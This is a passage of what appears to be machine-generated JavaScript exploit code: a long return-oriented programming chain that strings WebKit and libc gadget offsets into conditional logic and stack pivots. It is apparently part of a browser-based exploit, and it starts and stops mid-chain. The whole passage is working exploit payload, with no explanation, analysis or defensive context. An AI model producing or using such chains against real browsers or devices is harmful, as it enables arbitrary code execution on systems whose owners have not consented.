webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+329328, //L6580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+329280, //L6577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+329296, //L6578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6577: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6578: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6579: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6580: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+329408, //L6581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+329424, //L6582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6581: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6582: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+329520, //L6584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+329504, //L6583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6583: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6584: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+329600, //L6585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6586: db([48, 0]); // 0x30 
set_gadget(libc_base+144605,); //pop rdi //L6587: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+329744, //L6588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+329776, //L6590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+329760, //L6589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6588: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6589: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6590: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+329944, //L6592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+329960, //L6593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+329928, //L6591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6591: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6592: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6593: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+330072, //L6595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+330120, //L6598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+330088, //L6596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 
]); //L6595: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6596: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6597: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6598: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+330232, //L6599+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+330224, //L6599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6599: db([0, 0]); // 0x0 set_gadgets([ ropchain+330248, //L6599+24 ropchain+330264, //L6594 libc_base+782311, //pop rsp ropchain+335432, //L6600 //L6594: libc_base+764760, //pop rsi ropchain+330304, //L6601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6601: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6603: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+330424, //L6606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+330408, //L6604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6604: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6606: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+330600, //L6609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+330616, //L6610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+330568, //L6607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, 
rcx libc_base+764760, //pop rsi ropchain+330584, //L6608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6607: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6608: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6609: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6610: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+330696, //L6611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+330712, //L6612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6611: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6612: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+330808, //L6614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+330792, //L6613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6613: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6614: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+330888, //L6615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6615: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6616: db([45, 0]); // 0x2d set_gadget(libc_base+144605,); //pop rdi //L6617: db([45, 0]); // 0x2d set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+331032, //L6618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+331064, //L6620 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+331048, //L6619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6618: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6620: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+331232, //L6622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+331248, //L6623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+331216, //L6621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6621: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6622: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6623: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+331360, //L6625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+331408, //L6628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+331376, //L6626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6625: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6626: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6628: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, 
//shl rax, 3 libc_base+764760, //pop rsi ropchain+331520, //L6629+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+331512, //L6629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6629: db([0, 0]); // 0x0 set_gadgets([ ropchain+331536, //L6629+24 ropchain+331552, //L6624 libc_base+782311, //pop rsp ropchain+337144, //L6630 //L6624: libc_base+764760, //pop rsi ropchain+331592, //L6631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6631: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6633: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+331712, //L6636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+331696, //L6634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6634: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6636: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+331888, //L6639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+331904, //L6640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+331856, //L6637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+331872, //L6638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6637: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6638: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6639: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6640: 
db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+331984, //L6641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+332000, //L6642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6641: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6642: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+332096, //L6644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+332080, //L6643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6643: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6644: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+332176, //L6645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6645: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6646: db([43, 0]); // 0x2b set_gadget(libc_base+144605,); //pop rdi //L6647: db([43, 0]); // 0x2b set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+332320, //L6648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+332352, //L6650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+332336, //L6649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6648: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6649: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6650: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+332520, //L6652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+332536, //L6653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+332504, //L6651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6651: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6652: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6653: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+332648, //L6655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+332696, //L6658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+332664, //L6656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6655: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6656: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6657: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6658: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+332808, //L6659+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+332800, //L6659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6659: db([0, 0]); // 0x0 set_gadgets([ 
ropchain+332824, //L6659+24 ropchain+332840, //L6654 libc_base+782311, //pop rsp ropchain+338856, //L6660 //L6654: libc_base+764760, //pop rsi ropchain+332880, //L6661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6661: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6663: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+333000, //L6666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+332984, //L6664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6664: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6666: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+333176, //L6669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+333192, //L6670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+333144, //L6667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+333160, //L6668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6667: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6668: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6670: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+333272, //L6671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+333288, //L6672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); 
//L6671: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6672: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+333384, //L6674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+333368, //L6673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6673: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6674: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+333464, //L6675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6675: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6676: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L6677: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+333608, //L6678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+333640, //L6680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+333624, //L6679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6678: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6679: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6680: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+333808, //L6682 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+333824, //L6683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+333792, //L6681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6681: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6682: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6683: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+333936, //L6685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+333984, //L6688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+333952, //L6686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6685: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6686: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6687: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6688: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+334096, //L6689+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+334088, //L6689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6689: db([0, 0]); // 0x0 set_gadgets([ ropchain+334112, //L6689+24 ropchain+334128, //L6684 libc_base+782311, //pop rsp ropchain+340568, //L6690 //L6684: libc_base+764760, //pop rsi ropchain+334168, //L6691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L6693: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+334288, //L6696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+334272, //L6694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6696: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+334464, //L6699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+334480, //L6700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+334432, //L6697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+334448, //L6698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6697: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6698: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6699: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6700: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+334560, //L6701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+334576, //L6702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6702: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+334672, //L6704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+334656, //L6703 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6703: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+334752, //L6705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6705: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6706: db([35, 0]); // 0x23 set_gadget(libc_base+144605,); //pop rdi //L6707: db([35, 0]); // 0x23 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+334896, //L6708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+334928, //L6710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+334912, //L6709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6708: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6709: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6710: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+335096, //L6712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+335112, //L6713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+335080, //L6711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6711: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L6712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6713: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+335224, //L6715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+335272, //L6718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+335240, //L6716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6715: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6716: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6717: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6718: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+335384, //L6719+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+335376, //L6719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 